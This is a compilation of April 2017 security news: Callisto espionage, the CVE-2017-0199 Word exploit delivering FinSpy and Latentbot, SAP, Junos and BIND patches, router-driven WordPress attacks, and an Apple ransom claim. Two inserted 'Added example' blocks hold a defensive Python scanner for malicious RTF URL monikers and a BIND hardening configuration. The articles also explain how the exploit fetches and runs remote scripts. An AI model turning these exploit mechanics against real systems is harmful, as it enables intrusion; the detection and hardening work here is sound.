“The reason is that one of the common practices for YARA rule authors is to limit the size of scanned files, which is aimed mainly at improving performance of the scanning process. Large files, like the ones produced by XXMM malware, may become invisible for such rules, which is why we would like to recommend security researchers to consider this when creating rules for dropped malwares,” the expert added.
"Callisto" Cyberspies Target Europe, South Caucasus
13.4.2017 securityweek CyberSpy
F-Secure on Thursday published a report detailing the activities of Callisto, a threat actor whose primary goal appears to be intelligence gathering from entities interested in European foreign and security policy.
According to F-Secure, which hasn’t found any links between this and other known threat actors, the Callisto group has been active since at least October 2015. The hackers have been observed targeting various individuals and organizations in Eastern Europe and the South Caucasus region, which encompasses Georgia, Armenia and Azerbaijan.
In late 2015, when F-Secure started tracking Callisto, the group had sent out highly targeted Gmail phishing emails. Some of the messages were sent to personal email addresses, suggesting that the attackers had previously conducted reconnaissance. Experts believe the hackers managed to hijack some accounts and used them to send phishing emails to other targets.
In early 2016, the cyberspies sent spear-phishing emails carrying malicious documents to military and government officials, think tank employees and journalists. F-Secure is aware of the malicious emails sent to these individuals, but it’s unclear if the targets actually installed the malware on their systems.
The Word documents sent to targets embedded a piece of malware as an object, eliminating the need for using exploits. If recipients clicked on the document and allowed the package content to run when prompted, the malware would be executed.
The malware has been identified as Scout, one of the tools available in the RCS Galileo platform of Italian spyware maker Hacking Team. The company was hacked back in 2015 and many of its tools were leaked online. Researchers determined that the Callisto group used the installers that had been leaked at the time, rather than relying on the Galileo source code.
The Scout malware has been described as a light backdoor that can be used for reconnaissance and to install other malware on the infected system.
F-Secure’s analysis revealed that the Callisto group’s infrastructure had been linked to servers hosting stores that sell controlled substances, which suggests a possible cybercrime connection. Experts also discovered links between the infrastructure used by the threat actor and countries such as Russia, Ukraine and China.
“A cyber crime group with ties to a nation state, such as acting on behalf of or for the benefit of a government agency, is one potential explanation,” researchers said in their report. “However, we do not believe it is possible to make any definitive assertions regarding the nature or affiliation of the Callisto Group based on the currently available information.”
While F-Secure has not seen any Callisto attacks involving malware for more than a year, the security firm says the group is still active, with new phishing infrastructure set up every week.
It’s worth pointing out that the Russia-linked threat actor dubbed APT28, Pawn Storm and Fancy Bear has also been known to target entities in Eastern Europe and the Caucasus region.
Microsoft Kills Support for Windows Vista
13.4.2017 securityweek Security
While expected for some time, Microsoft this week ended support for its Windows Vista operating systems. The change entered into effect on April 11, the very same day Microsoft began rolling out Windows 10 Creators Update to its users.
Windows Vista has been receiving software updates for the past 10 years, but Microsoft has decided that the time has come to move on.
“As of April 11, 2017, Windows Vista customers are no longer receiving new security updates, non-security hotfixes, free or paid assisted support options, or online technical content updates from Microsoft,” the company notes on its support website.
Data coming from NetMarketShare shows that the move would impact only 0.72% of all desktop users out there, but that is still a significant figure, considering that many of the Windows Vista computers are used within business environments.
A November report from Duo Security revealed that 65% of the security company’s clients' Windows users were using Vista. The threat this poses to enterprise networks is amplified by the continuous use of an even older operating system within business environments: Windows XP. The platform currently has 7.44% of the desktop operating system market, yet it hasn’t received updates since 2014.
Now that support has ended, Windows Vista will continue to work as before, but it will become increasingly vulnerable to security risks and malware. What’s more, Internet Explorer 9, which runs on Vista, isn’t supported either, meaning that users are exposed to additional threats when browsing the web using this application.
“Also, as more software and hardware manufacturers continue to optimize for more recent versions of Windows, you can expect to encounter more apps and devices that do not work with Windows Vista,” Microsoft says.
In fact, major browser makers have already announced their end of support for the platform. Mozilla revealed in December 2016 that it would no longer support Vista and XP starting this year, while Google’s Chrome 49 was the last browser iteration released for the two platforms. Gmail isn’t offering support for the operating systems either, after it dropped support for Chrome 53 and older versions in February.
To further encourage users to move away from Windows Vista, Microsoft also stopped providing Microsoft Security Essentials for download on this platform. Antimalware signature updates will continue to arrive for installed instances for a limited time, after which users will remain exposed to newer threats.
“Please note that Microsoft Security Essentials (or any other antivirus software) will have limited effectiveness on PCs that do not have the latest security updates. This means that PCs running Windows Vista will not be secure and will still be at risk for virus and malware,” Microsoft notes.
CVE-2017-0199 Zero Day exploit used to deliver FINSPY spyware
13.4.2017 securityaffairs Vulnerebility
Security researchers at FireEye discovered that the Microsoft Word CVE-2017-0199 exploit was linked to cyber-spying in the Ukraine conflict.
The zero-day vulnerability in Microsoft Office that was recently fixed by Microsoft was used to deliver surveillance malware to Russian-speaking targets.
Security experts from the firm FireEye spotted the targeted attacks leveraging specially crafted Microsoft Word documents that pretend to be a Russian military training manual.
When the victim opens the document, the attack starts and the surveillance malware FinSpy is delivered; the malware is developed by a subsidiary of Gamma Group. Officially the software is offered for sale only to government agencies and law enforcement bodies, but privacy advocates suspect the spyware is also sold to authoritarian regimes.
“FireEye assesses with moderate confidence that CVE-2017-0199 was leveraged by financially motivated and nation-state actors prior to its disclosure.” reads the analysis published by FireEye. “Actors leveraging FINSPY and LATENTBOT used the zero-day as early as January and March, and similarities between their implementations suggest they obtained exploit code from a shared source. Recent DRIDEX activity began following a disclosure on April 7, 2017.”
The experts are still investigating who the final targets of the attacks are; however, the decoy document appears to have been published in the Donetsk People’s Republic, a breakaway region in Ukraine that has received Russian support.
“As early as Jan. 25, 2017, lure documents referencing a Russian Ministry of Defense decree and a manual allegedly published in the “Donetsk People’s Republic” exploited CVE-2017-0199 to deliver FINSPY payloads. Though we have not identified the targets, FINSPY is sold by Gamma Group to multiple nation-state clients, and we assess with moderate confidence that it was being used along with the zero-day to carry out cyber espionage.” continues FireEye.
“The malicious document, СПУТНИК РАЗВЕДЧИКА.doc (MD5: c10dabb05a38edd8a9a0ddda1c9af10e), is a weaponized version of a widely available military training manual (Figure 1). Notably, this version purports to have been published in the “Donetsk People’s Republic,” the name given to territory controlled by anti-Kyiv rebels in Eastern Ukraine.”
The weaponized Russian training manual can download additional payloads along with another fake document claiming to be a Russian decree approving a forest management plan.
FireEye experts suspect that a non-state actor, operating much like a government operator, may have used the FinSpy software against these targets.
It is also possible that the zero-day exploit circulated in the cybercriminal underground: in March, a separate attack triggering the same flaw was spotted by the experts.
“As early as March 4, 2017, malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware. The malware, which includes credential theft capability, has thus far only been observed by FireEye iSIGHT Intelligence in financially motivated threat activity. Additionally, generic lures used in this most recent campaign are consistent with methods employed by financially motivated actors.” adds FireEye.
Different hacking groups likely obtained knowledge of the zero-day from the same source.
SAP Patches Critical Code Injection Flaw in TREX
13.4.2017 securityweek Vulnerebility
SAP this week released its April 2017 set of patches. The most important of the 15 security notes resolves a Very High priority (Hot News) vulnerability in TREX / BWA that could allow an attacker to execute commands on the affected system.
Carrying a CVSS score of 9.4, and discovered by ERPScan, the note is the third in a series of patches that SAP has been releasing for NetWeaver Search and Classification (TREX) and NetWeaver Business Warehouse Accelerator (BWA) since December 2015, to prevent remote command execution. The issue was initially addressed with SAP Note 2234226, which was later updated with SAP Note 2273881, and now patched with SAP Note 2419592.
Onapsis, the firm that discovered the original vulnerability in 2015, explains that TREXNet, the internal communication protocol developed for TREX service, does not enforce any kind of authentication, but is required by TREX servers. This means that it exposes systems to malicious actors, who can remotely execute critical system and OS commands.
According to ERPScan, a company that specializes in securing SAP and Oracle products, because TREX is deployed in over a dozen SAP products, including SAP HANA, this vulnerability is considered one of the most widespread and severe SAP server-side issues. What’s more, the advisory with all the details was available on the web for 2 years, thus exposing numerous applications to attacks, ERPScan says.
“I reversed a protocol for HANA and then for the TREX search engine. As they share a common protocol, the exploit has been easily adapted. SAP fixed some features, but not everything affecting the core protocol. It was still possible to get full control on the server even with a patched TREX,” Mathieu Geli, Head of SAP Threat Intelligence at ERPScan and the researcher who discovered the issue, explains.
SAP’s April 2017 advisory reveals that three of the 15 security notes included in this month’s Security Patch Day were updates to previous notes, including one to a Remote Code Execution vulnerability in SAP GUI for Windows. Four of the security notes had a High severity rating, 8 were rated Medium risk, and two were considered Low severity.
ERPScan, on the other hand, says that there were 12 additional security notes included in this set of patches, for a total of 27 notes (17 SAP Security Patch Day Notes and 10 Support Package Notes).
7 of the patches were Missing Authorization Checks, 4 were Cross-Site request forgery, 3 Cross-Site Scripting, 2 Remote Code Execution (RCE), 2 XML external entity, 2 information disclosure, 2 denial of service, 1 open redirect, 1 buffer overflow, 1 directory traversal, and 2 other flaws.
In addition to the RCE flaw in TREX / BWA, SAP addressed three more vulnerabilities found by ERPScan researchers: a Cross-Site Scripting vulnerability in SAP NetWeaver Central Technical Configuration (CVSS Base Score: 6.3), a Cross-Site Scripting vulnerability in SAP NetWeaver Java Archiving Framework (CVSS Base Score: 6.1), and an XML external entity vulnerability in SAP Knowledge Management ICE Service (CVSS Base Score: 4.9).
Other critical issues SAP resolved this month include a Denial of service vulnerability in SAP SAPLPD (CVSS Base Score: 7.5), an XML external entity vulnerability in SAP Web Dynpro Flash Island (CVSS Base Score: 7.5), and a Missing authorization check vulnerability in SAP NetWeaver ADBC Demo Programs (CVSS Base Score: 6.3).
“After a pretty significant March Update, which included the highest critical note of the year (SAP HANA Self Service Vulnerability with CVSS 9.8 and other relevant High Priority notes) this is the second month with remote code injection vulnerabilities present. As a result, SAP Security Note #2419592 should be prioritized among the others as it implies a similar attack as the two others previously mentioned that impact TREX,” Onapsis says.
Juniper Networks Patches Several Flaws With Junos Updates
13.4.2017 securityweek Vulnerebility
Updates released by Juniper Networks for its Junos operating system patch several high and medium severity vulnerabilities. The company has also updated some of the third-party software used by its products.
Juniper Networks informed customers on Tuesday that it has launched an investigation into the new batch of exploits made public last week by the hacker group calling itself Shadow Brokers. The first round of files leaked by the Shadow Brokers in the summer of 2016 was found to contain some exploits targeting devices running Juniper’s ScreenOS.
Until it determines if any of its products are targeted by the newly released exploits, which are believed to have been used by the NSA-linked Equation Group, Juniper Networks has released updates that patch several vulnerabilities in the FreeBSD-based Junos OS.
The most severe of the flaws, based on its CVSS score, is CVE-2016-10142, an issue related to the IPv6 protocol specification, namely ICMP Packet Too Big (PTB) messages. The vulnerability can be exploited for denial-of-service (DoS) attacks.
Another high severity flaw is CVE-2016-1886, a keyboard driver buffer overflow that can be exploited to cause a DoS condition, read parts of the kernel memory, or execute arbitrary code.
It’s worth pointing out that CVE-2016-10142 and CVE-2016-1886 are not specific to Juniper products; the vulnerabilities are in FreeBSD and other Linux distributions.
The third high severity vulnerability is CVE-2017-2313, a DoS issue that affects some Junos systems when BGP is enabled.
The medium severity weaknesses disclosed by the company this week are DoS flaws affecting various configurations. These security holes are tracked as CVE-2017-2313, CVE-2017-2312 and CVE-2017-2340.
Juniper is not aware of any instances where these vulnerabilities have been exploited for malicious purposes.
The vendor also announced patches for vulnerabilities affecting its NorthStar Controller application, and updates for the BIND and NTP components used by the company’s products. The NTP and BIND patches applied by Juniper were first made available several months ago, and other fixes have since been released for both NTP and BIND.
Office 0-Day Abused in Latentbot, WingBird Attacks
13.4.2017 securityweek Vulnerebility
A Microsoft Office 0-day vulnerability that was disclosed just days ago is already being exploited by attackers associated with malware families such as Latentbot and WingBird.
Tracked as CVE-2017-0199, the security bug allows a malicious actor to craft an RTF (Rich Text Format) document that downloads and executes a Visual Basic script containing PowerShell commands. Microsoft has already addressed the flaw, but not quickly enough to prevent malware such as the Dridex banking Trojan from abusing it in attacks.
The exploit for this vulnerability was found to bypass most mitigations available before a patch was released, and could also render Protected View useless, security researchers discovered. This means that attacks leveraging the vulnerability don’t require user interaction to be successful.
The exploit leverages Office’s Object Linking and Embedding (OLE) functionality to link to an HTA (HTML Application) file hosted on a remote server. When the user opens the RTF document received via spam email, winword.exe issues an HTTP request to retrieve the malicious HTA file, which loads and executes the malicious Visual Basic script. In turn, the script downloads and executes malware.
According to FireEye, the malicious scripts used in these incidents were also observed terminating the winword.exe processes (to hide a prompt from OLE2link) and loading decoy documents.
The security researchers stumbled upon such attacks designed to distribute a newer variant of Latentbot, a highly obfuscated bot that has been active since 2013. The bot has a highly modular plugin architecture and has been also associated with the Pony infostealer.
Latentbot packs different injection mechanisms for Windows XP (x86) and Windows 7 operating systems: it uses Attrib.exe patching and Svchost code Injection on the former, but injects code into svchost.exe directly on the latter.
Another attack abusing this vulnerability consisted of two malicious stages, and distributed a variant of the dropper known as WingBird (which has similar characteristics as FinFisher). Heavily obfuscated, the malware packs several anti-analysis measures, including a custom VM to slow analysis, and was recently associated with the activities of a threat group known as NEODYMIUM.
Netskope Threat Research Labs, on the other hand, say that this Office zero-day vulnerability can also be linked to the Godzilla botnet loader. The researchers observed that the IPs related to the loader were serving payloads associated with exploits for this bug, but say that they “cannot speculate that the spam campaign and zero-day are related,” although the same attack group appears to be behind the attacks.
Office users are advised to apply the newly released patches as soon as possible, to ensure they are protected from these attacks.
Critical bug in SAP TREX affects SAP HANA and other applications
13.4.2017 securityaffairs Vulnerebility
SAP has issued a security patch for the SAP TREX search engine that also addresses a two-year-old critical vulnerability.
SAP has issued a security patch for the SAP TREX search engine that addresses multiple vulnerabilities, including a flaw that experts found had only been partially fixed by a patch released in December 2015.
The SAP TREX search engine is used by many SAP products, including SAP HANA and its NetWeaver application and integration platform.
“SAP, the largest enterprise software maker, closed a critical vulnerability affecting SAP’s search engine TREX. The issue stayed exposed almost 2 years.” reads a blog post published by the company ERPScan that discovered the flaw. “The vulnerable component is included in the old SAP NetWeaver platform as well as in the new SAP HANA one, which makes it one of the most widespread and severe SAP server-side issues so far with CVSS score 9.4 out of 10. The vulnerability was identified by specialists at ERPScan,” “If exploited, the vulnerability would allow a remote attacker to get full control over the server without authorization.”
SAP was affected by a critical code injection vulnerability (SAP Security Note 2419592) that the company had tried to address with the 2015 patch; unfortunately, the problem was not completely solved.
Mathieu Geli from ERPScan discovered that the TREXNet communication protocol implemented in the SAP TREX search engine did not implement an authentication mechanism.
“Originally, the vulnerability was discovered in SAP HANA in 2015 and the corresponding SAP Security Note (2234226) was released in December 2015. The issue was dubbed a potential technical information disclosure and fixed by removing some critical functions.” continues the post. “Later on, Mathieu Geli from ERPScan conducted a further research and revealed that the vulnerability was still exploitable. He found out that TREXNet, an internal communication protocol used by TREX, did not provide an authentication procedure. “
The expert reverse-engineered a protocol for HANA and then for the SAP TREX search engine. Both share a common protocol, so the exploit could easily be adapted. He highlighted that SAP fixed only some features, not everything affecting the core protocol.
“I reversed a protocol for HANA and then for the TREX search engine. As they share a common protocol, the exploit has been easily adapted. SAP fixed some features, but not everything affecting the core protocol. It was still possible to get full control on the server even with a patched TREX.” explained the expert.
The vulnerability, tracked as CVE-2017-7691, could be exploited by an attacker to read or create operating system files by sending a crafted request to TREXNet ports.
The flaw was fixed along with other bugs in SAP’s April security release.
Not Just Criminals, But Governments Were Also Using MS Word 0-Day Exploit
13.4.2017 thehackernews Vulnerebility
Recently we reported about a critical code execution vulnerability in Microsoft Word that was being exploited in the wild by cyber criminal groups to distribute malware like Dridex banking trojans and Latentbot.
Now, it turns out that the same previously undisclosed vulnerability in Word (CVE-2017-0199) was also being actively exploited by government-sponsored hackers to spy on Russian targets since at least this January.
The news comes after security firm FireEye, which independently discovered this flaw last month, published a blog post revealing that FinSpy spyware was installed as early as January using the same vulnerability in Word, which was patched on Tuesday by Microsoft.
For those unaware, the vulnerability (CVE-2017-0199) is a code execution flaw in Word that could allow an attacker to take over a fully patched and up to date computer when the victim opens a Word document containing a booby-trapped OLE2link object, which downloads a malicious HTML app from a server, disguised as a document created in Microsoft's RTF (Rich Text Format).
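Added example, not FireEye's, Netskope's or Microsoft's code: a heuristic Python scanner for the document pattern described here and in the Latentbot and FinSpy articles above, an OLE object marked `\objautlink`/`\objupdate` whose `\*\objdata` stream carries a URL moniker (CLSID 79EAC9E0-BAF9-11CE-8C82-00AA004BA90B) pointing at a remote file. The sample document is constructed to carry only those marker bytes and is not a working object; the verdict threshold and field names are assumptions.

```python
import re

# CLSID_StdURLMoniker {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B} as serialised on disk (little-endian GUID).
URL_MONIKER_CLSID = bytes.fromhex("e0c9ea79f9bace118c8200aa004ba90b")
OBJDATA_RE = re.compile(rb"\\\*\\objdata\b")


def _group_body(data: bytes, start: int) -> bytes:
    """Return the bytes from `start` up to the brace that closes the enclosing RTF group."""
    depth = 0
    i = start
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\":  # control symbol or escaped brace: the next byte is not structural
            i += 2
            continue
        if c == b"{":
            depth += 1
        elif c == b"}":
            if depth == 0:
                return data[start:i]
            depth -= 1
        i += 1
    return data[start:]


def _decode_objdata(body: bytes) -> bytes:
    """\\*\\objdata holds the OLE object as hex text; drop whitespace and stray control words."""
    hex_only = re.sub(rb"[^0-9A-Fa-f]", b"", body)
    if len(hex_only) % 2:
        hex_only = hex_only[:-1]  # truncated or damaged stream: decode what is whole
    return bytes.fromhex(hex_only.decode("ascii"))


def _extract_urls(blob: bytes) -> list:
    """After the URL moniker CLSID comes a 4-byte little-endian length, then a UTF-16LE URL."""
    urls = []
    pos = blob.find(URL_MONIKER_CLSID)
    while pos != -1:
        length = int.from_bytes(blob[pos + 16:pos + 20], "little")
        raw = blob[pos + 20:pos + 20 + min(length, 4096)]  # cap: a hostile length must not blow up
        url = raw.decode("utf-16-le", errors="replace").split("\x00", 1)[0]
        if url:
            urls.append(url)
        pos = blob.find(URL_MONIKER_CLSID, pos + 16)
    return urls


def scan_rtf(data: bytes) -> dict:
    """Heuristic triage of one RTF document; 'suspicious' means look closer, not 'malicious'.
    Ordinary linked objects also use \\objupdate, so the URL moniker is the stronger signal."""
    result = {
        "objautlink": re.search(rb"\\objautlink\b", data) is not None,
        "objupdate": re.search(rb"\\objupdate\b", data) is not None,
        "url_moniker": False,
        "urls": [],
    }
    for m in OBJDATA_RE.finditer(data):
        blob = _decode_objdata(_group_body(data, m.end()))
        if URL_MONIKER_CLSID in blob:
            result["url_moniker"] = True
            result["urls"].extend(_extract_urls(blob))
    linked_autoupdate = result["objautlink"] and result["objupdate"]
    result["verdict"] = "suspicious" if (result["url_moniker"] or linked_autoupdate) else "clean"
    return result


def build_fixture(url: str) -> bytes:
    """Constructed test document: carries only the moniker bytes the scanner keys on.
    It is not a functioning OLE object and Word would not load it."""
    wide = url.encode("utf-16-le") + b"\x00\x00"
    moniker = URL_MONIKER_CLSID + len(wide).to_bytes(4, "little") + wide
    return (b"{\\rtf1\\ansi Quarterly report\\par"
            b"{\\object\\objautlink\\objupdate\\objw1000\\objh1000"
            b"{\\*\\objdata " + moniker.hex().encode("ascii") + b"}}}")


SAMPLE_LINKED = build_fixture("http://example.invalid/doc.hta")
SAMPLE_BENIGN = b"{\\rtf1\\ansi Plain memo with no embedded objects.\\par}"
# An ordinary embedded (not linked) object with opaque data: no moniker, no auto-update.
SAMPLE_EMBEDDED = b"{\\rtf1{\\object\\objemb{\\*\\objdata 0105000002000000}}}"
```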
FinSpy or FinFisher is associated with the controversial UK-based firm Gamma Group, which sells so-called "lawful intercept" spyware to governments around the world.
"Though only one Finspy user has been observed leveraging this zero-day exploit, the historical scope of Finspy, a capability used by several nation-states, suggests other customers had access to it," FireEye researchers said.
"Additionally, this incident exposes the global nature of cyber threats and the value of worldwide perspective—a cyber espionage incident targeting Russians can provide an opportunity to learn about and interdict crime against English speakers elsewhere."
Months later in March, the same then-zero-day vulnerability was used to install Latentbot, a bot-like, information-stealing and remote-access malware package used by financially motivated criminals.
Latentbot has several malicious capabilities including credential theft, remote desktop functions, hard drive and data wiping, and the ability to disable antivirus software.
FireEye said criminals used social engineering to trick victims into opening the attachments with generic subject lines like "hire_form.doc", "!!!!URGENT!!!!READ!!!.doc", "PDP.doc", and "document.doc".
However, on Monday, the criminals behind the attack modified their campaign to deliver a different malware package called Terdot, which then installed software that uses the TOR anonymity service to hide the identity of the servers it contacted.
According to FireEye researchers, the MS Word exploit used to install Finspy on Russian computers by government spies and the one used in March to install Latentbot by criminal hackers was obtained from the same source.
This finding highlights that whoever initially discovered this zero-day vulnerability sold it to many actors, including commercial companies that deal in buying and selling zero-day exploits as well as financially motivated online criminals.
Also, just Monday evening, Proofpoint researchers too discovered a massive campaign of spam email targeting millions of users across financial institutions in Australia with the Dridex banking malware, again, by exploiting the same vulnerability in Word.
FireEye researchers are still not sure of the source for the exploit that delivered the Dridex banking trojan, but it is possible that the vulnerability disclosure by McAfee last week provided insight that helped Dridex operators use the flaw, or that someone with access to the Word exploit gave it to them.
Microsoft patched the MS Word vulnerability on Tuesday, after hackers as well as government spies had been exploiting it for months. So, users are strongly advised to install updates as soon as possible to protect themselves against the ongoing attacks.
BIND Updates Patch Three Vulnerabilities
13.4.2017 securityweek Vulnerebility
The Internet Systems Consortium (ISC) announced this week that updates released for the DNS software BIND patch several denial-of-service (DoS) vulnerabilities that can be exploited remotely.
BIND versions 9.9.9-P8, 9.10.4-P8 and 9.11.0-P5 address three new security holes that could lead to an assertion failure.
The most serious of the flaws, with a “high” severity rating and a CVSS score of 7.5, is CVE-2017-3137. The vulnerability allows an attacker to cause a DoS condition, and it mainly affects recursive resolvers, but authoritative servers could also be vulnerable if they perform recursion.
“A server which is performing recursion can be forced to exit with an assertion failure if it can be caused to receive a response containing CNAME or DNAME resource records with certain ordering,” ISC said in its advisory.
Another vulnerability patched with the latest BIND updates is CVE-2017-3136, a medium severity issue that can trigger an assertion failure on servers configured to use DNS64 with the "break-dnssec yes;" option.
The third flaw, CVE-2017-3138, can be exploited to make the BIND name server (named) process exit by sending it a null command string on its control channel. The flaw can only be exploited from hosts that the server's controls ACL allows to reach the control channel, so it is remotely exploitable only where that channel is exposed beyond localhost.
ISC said there was no evidence that any of these vulnerabilities had been exploited in the wild.
BIND vulnerable to new reflection attacks
Earlier this month, Ixia security software engineer Oana Murarasu reported finding a new DDoS attack amplification method. The expert discovered that BIND’s recursive DNS resolver allows reflection attacks through root DNAME query responses.
“This amplification attack generates responses 10 or more times larger than the query sent,” Murarasu explained. “For every 1 megabit of traffic sent, 10 megabits is sent to the victim.”
The issue has been reported to ISC, but the organization determined that these attacks are possible due to a protocol design flaw and not a vulnerability in BIND itself. Ixia said Microsoft’s DNS server is not susceptible to such attacks.
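The configuration an operator would want to check after reading the three advisories and the DNAME reflection report above, as an added example that is not from ISC's advisories or from the page: the control channel that CVE-2017-3138 reaches is restricted to the loopback address and an HMAC key, recursion (the reflector the root-DNAME amplification needs) is limited to the operator's own networks, response rate limiting caps what a spoofed-source flood can extract, and the DNS64 "break-dnssec yes;" option that CVE-2017-3136 depends on is left off. The key name, the 192.0.2.0/24 range, the directory and the rate figures are placeholders.

```conf
// Added example named.conf fragment (not from the page or ISC). Key name,
// address ranges, directory and limits are placeholders to adapt.

// CVE-2017-3138: the null-command crash is reachable only from hosts the
// controls ACL admits, so admit only loopback and require a key.
controls {
    inet 127.0.0.1 port 953 allow { 127.0.0.1; } keys { "rndc-key"; };
};

key "rndc-key" {
    algorithm hmac-sha256;
    secret "REPLACE-WITH-OUTPUT-OF-rndc-confgen";
};

options {
    directory "/var/named";

    // A resolver that recurses for the whole Internet is the reflector the
    // root-DNAME amplification needs; recurse only for your own networks.
    recursion yes;
    allow-recursion { 127.0.0.1; ::1; 192.0.2.0/24; };
    allow-query-cache { 127.0.0.1; ::1; 192.0.2.0/24; };

    // Response rate limiting (standard in BIND 9.10+, needs --enable-rrl on
    // 9.9 builds): identical answers to one client /24 are capped, and every
    // second excess query gets a truncated answer instead of a 10x payload.
    rate-limit {
        responses-per-second 10;
        window 5;
        slip 2;
    };

    // CVE-2017-3136 only affects DNS64 with "break-dnssec yes;". If DNS64 is
    // needed at all, keep break-dnssec at its default of no.
    // dns64 64:ff9b::/96 { break-dnssec no; };
};
```

Reload with rndc after editing and confirm with `named-checkconf`; the ACLs do not replace the update to 9.9.9-P8, 9.10.4-P8 or 9.11.0-P5, since CVE-2017-3137 is triggered by upstream responses that no local ACL filters.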
Tens of thousands of compromised routers abused in WordPress attacks
13.4.2017 securityaffairs Attack
Hackers exploited the CVE-2014-9222 flaw, also known as ‘Misfortune Cookie’, to hack thousands of home routers and abuse them for WordPress attacks.
According to experts at the security firm Wordfence, tens of thousands of home routers have been hacked and used to power attacks on WordPress websites.
The security firm observed a spike in the number of attacks originating from Algeria against customer websites. Further investigation revealed that the attacks were launched from more than 10,000 IP addresses, most of which belonged to the state-owned telecoms company Telecom Algeria.
“Last week, while creating the Wordfence monthly attack report, we noticed that Algeria had moved from position 60 in our “Top Attacking Countries” list to position 24. That was a big jump and we were curious why Algeria had climbed the attack rankings so rapidly.” reads the analysis published by Wordfence.
“What we discovered on closer examination is that over 10,000 IP addresses in Algeria were attacking WordPress websites in March. Most IPs were only launching between 50 and 1000 attacks during the entire month.”
The hackers exploited vulnerabilities in the routers provided by Telecom Algeria to its customers, then compromised the devices to launch brute-force and other WordPress attacks.
Wordfence identified compromised routers at 27 other ISPs worldwide involved in the WordPress attacks. The routers of more than a dozen of these ISPs are listening on port 7547, the TR-069 (CWMP) port that ISPs use for remote management of customer devices, and the experts noticed that the affected devices are running a vulnerable version of the AllegroSoft RomPager embedded web server.
All RomPager versions prior to 4.34 are affected by a critical vulnerability tracked as CVE-2014-9222, also known as 'Misfortune Cookie'.
The flaw was reported in December 2014 by researchers at Check Point Software Technologies, who found that more than 12 million home routers were affected by the issue.
The vulnerability could be exploited by an attacker to take control of an affected router and run a man-in-the-middle attack on traffic going to and from it, whichever vendor built the device.
Once an attacker has compromised a router, they can target any other device on the local network, such as a smart TV or a printer.
The flaw can be exploited to hijack a large number of devices made by Huawei, Edimax, D-Link, TP-Link, ZTE, ZyXEL and other vendors.
The routers provided by 14 of the 28 ISPs are vulnerable to Misfortune Cookie attacks.
According to Wordfence, in just three days, 6.7 percent of all attacks aimed at protected WordPress websites came from home routers that have port 7547 open.
Last month, Wordfence observed more than 90,000 unique IP addresses from the 28 ISPs associated with compromised routers; most of them generated fewer than 1,000 attacks over the course of up to 48 hours, after which they stopped.
“In just the past month we have seen over 90,000 unique IP addresses at 28 ISPs that fit our compromised-router attack pattern. We monitor these attacks across our customer websites which is an attack surface of over 2 million websites.” states Wordfence. “We only see a sample of the attacks that all websites globally experience. If you extrapolate the numbers, it indicates that there is a very large number of compromised ISP routers out there performing attacks and acting in concert.”
Wordfence has published a free online tool that can be used to check whether a router has port 7547 open.
Prison Inmates Built PCs from e-Waste and Connected Online Using Prison Network
13.4.2017 thehackernews Hacking
Can you imagine your world without the Internet?
I know it's hard to imagine your life without the Internet, and the same was true for two Ohio prisoners who built personal computers from e-waste parts, hid them in the ceiling, and connected those PCs to the Internet via the prison's network.
The incident occurred in 2015 but has only now been made public by the State of Ohio's Office of the Inspector General, which published a 50-page report [PDF] on Tuesday following an almost year-long investigation.
According to the report, a prison work program backfired when two inmates of the Marion Correctional Institution in Marion, Ohio smuggled computer parts out of an e-waste recycling workshop and built two clandestine computers from them.
The unsupervised inmates hid the computers behind a plywood board in the ceiling of a training room, and then connected the working PCs to the Ohio Department of Rehabilitation and Correction (ODRC) network to reach the Internet.
But once the inmates were online, unsurprisingly, they used their skills to break the law.
The prisoners accessed the internal records of other inmates, created inmate passes for restricted areas, visited websites with information about manufacturing drugs, weapons and explosives, and applied for credit cards under another prisoner's name for a planned tax fraud scheme, Ohio's government watchdog said.
Besides this, the forensics team also found "self-signed certificates, Pidgin chat accounts, Tor sites, Tor geo exit nodes, ether soft, pornography, videos, VideoLan, virtual phone, and other various software."
The scheme was discovered after prison technology employee Gene Brady raised the alarm about unusual levels of internet activity on a contractor's account on days when that contractor was not scheduled to work.
Ultimately, a total of five inmates were identified as being involved with the hidden computers during the investigation:
Stanislov Transkiy – Executive committee chairman of Recycling.
Leeshan McCullough – Chairman of aquaculture.
Robert Cooper – Chairman of horticulture.
Matthew Brown – Chairman of environmental education.
Adam Johnston – Executive committee treasurer.
All the five inmates have now been separated and moved to other correctional facilities.
"We will thoroughly review the reports and take any additional steps necessary to prevent these types of things from happening again," the ODRC said in a statement.
"It's of critical importance that we provide necessary safeguards in regards to the use of technology while still providing opportunities for offenders to participate in meaningful and rehabilitative programming."
The Marion Correctional Institution (MCI), which houses nearly 2,500 inmates, operates many programs to educate or provide services to the community, including the MCI Green Initiative to revamp the institution's trash and recycling processes.
The iPhone Attack Never Happened. Hackers Claim Apple Paid Them a Ransom
12.4.2017 Idnes.cz Apple
By April 7, bitcoins were supposed to land in the accounts of a London hacker group calling itself Turkish Crime Family. Otherwise, the group threatened, it would abuse hundreds of millions of login credentials belonging to owners of iPhones and other Apple devices, lock their user accounts and wipe their data from the cloud storage. Later it also threatened to attack the company's servers (we reported on it here).
Turkish Crime Family (Twitter)
@turkcrimefamily
7 April 2017, 20:54 (post archived 9 April 2017, 20:26)
We're still waiting for the payment, if we do not receive it any time soon the attack will start https://t.co/AUqI6bSmPW
The key date passed and nothing happened to users. On its Twitter account, the group claims that this is because the ransom reached it.
On Friday, the administrator of the Turkish Crime Family account first wrote that, according to a message from a negotiator, they had reached an agreement with Apple. Later, once the stated deadline of 18:30 Central European Time had passed, he added a tweet saying the bitcoins had still not arrived and that they were ready to launch the attack.
A simple tweet followed: "Hello everybody, look what we have here." Attached was a link to a transaction record that had been run through a so-called tumbler, a service meant to make a cryptocurrency transaction harder to trace, mainly by obscuring who the sender was.
According to the link, a transaction worth 401 bitcoins took place, roughly 470 thousand US dollars at Sunday's exchange rate (just under 12 million Czech crowns).
Turkish Crime Family (Twitter)
@turkcrimefamily
7 April 2017, 22:50 (post archived 9 April 2017, 20:27)
Hello everybody, look what we have here https://t.co/I3B0wh1Udv
"A deal is a deal," a representative of the hacker group told the International Business Times (IBT), confirming that Turkish Crime Family had called off the attack on the strength of the ransom. This ending, however, did nothing to answer the main question that specialist sites had been asking all along: how real was the threat? Could the group really have harmed the world's largest technology company?
Given the anonymous nature of bitcoin, it is of course unclear who the money actually came from. It is therefore possible that Apple never negotiated with the extortionists and that the group staged the whole thing. The relatively small sum could have been put together by the group itself to build the aura of hackers who beat Apple, which could serve it well in future threats.
